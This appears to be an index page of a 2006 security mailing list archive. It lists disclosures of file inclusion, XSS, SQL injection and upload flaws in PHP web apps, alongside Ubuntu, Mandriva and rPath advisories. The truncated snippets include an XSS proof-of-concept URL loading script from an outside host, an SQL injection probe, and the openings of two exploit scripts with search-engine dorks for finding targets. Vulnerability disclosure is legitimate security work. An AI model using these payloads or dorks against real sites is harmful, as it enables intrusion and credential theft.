[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

2006-07-13 Thread matdhule
ECHO_ADV_38$2006 --- [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

Photocycle v1.0 - XSS

2006-07-13 Thread luny
Photocycle v1.0 Homepage http://adambrown.info/p/tools/photocycle XSS vuln on phpage var: PoC http://www.example.com/photocyclephpage=script%20src=http://www.youfucktard.com/xss.js/script

ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability

2006-07-13 Thread x0r0n
ScozNews Final-Php =1.1 Remote File Inclusion Vulnerability -- Discovered By: XORON -- [EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com -- script site: www.scoznet.com

Orbitmatrix PHP Script v1.0

2006-07-13 Thread luny
Orbitmatrix PHP Script v1.0 Homepage: http://www.orbitcoders.com/ Affected files: index.php Possible SQL injection?: http://www.example.com/index.php?page_name=' And by trying an XSS vuln as shown below on page_name we see the query below which is displayed on screen:

Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability

2006-07-13 Thread x0r0n
Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability -- Discovered By: XORON -- [EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com -- Exploit:

[USN-317-1] zope2.8 vulnerability

2006-07-13 Thread Martin Pitt
=== Ubuntu Security Notice USN-317-1 July 13, 2006 zope2.8 vulnerability CVE-2006-3458 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 This

[USN-318-1] libtunepimp vulnerability

2006-07-13 Thread Martin Pitt
=== Ubuntu Security Notice USN-318-1 July 13, 2006 libtunepimp vulnerability http://bugs.musicbrainz.org/ticket/1764 === A security issue affects the following Ubuntu

[ MDKSA-2006:122 ] - Updated php packages fix multiple vulnerabilities

2006-07-13 Thread security
Mandriva Linux Security Advisory MDKSA-2006:122 http://www.mandriva.com/security/

flatnuke = 2.5.7 arbitrary php file upload

2006-07-13 Thread rgod
12/07/2006 19.11.54 - Flatnuke 2.5.7 arbitrary file upload / remote code execution - software: site: http://www.flatnuke.org/ if user Gallery uploads are enabled (not the default) you can go to:

PHORUM 5 arbitrary local inclusion

2006-07-13 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on ? echo PHORUM 5 arbitrary local inclusion exploit\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\n;; echo dork: \This forum powered by Phorum.\\n\n; /* works with: register_globals=On magic_quotes_gpc=Off */ if

phpbb 3.x sql injection (with global moderator rights)

2006-07-13 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on ? echo PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n; echo by rgod [EMAIL PROTECTED]; echo site: http://retrogod.altervista.org\n;; echo dork, version specific: \Powered by phpBB * 2002, 2006 phpBB Group\\n\n; /*

Re: [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

2006-07-13 Thread Joxean Koret
Hello, On Thu, 13-07-2006 at 01:35 +, [EMAIL PROTECTED] wrote: require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); Variables $mosConfig_absolute_path are not properly sanitized.

[ MDKSA-2006:123 ] - Updated kernel packages fixes multiple vulnerabilities

2006-07-13 Thread security
Mandriva Linux Security Advisory MDKSA-2006:123 http://www.mandriva.com/security/

perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

2006-07-13 Thread endeneu
--- perForms = 1.0 ([mosConfig_absolute_path]) Remote File Inclusion --- Remote : Yes Critical Level : High Vuln found in a log file: lazy

rPSA-2006-0122-2 kernel

2006-07-13 Thread Justin M. Forbes
rPath Security Advisory: 2006-0122-2 Published: 2006-07-07 Updated: 2006-07-13 Upgraded to Critical status with additional information Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: kernel=/[EMAIL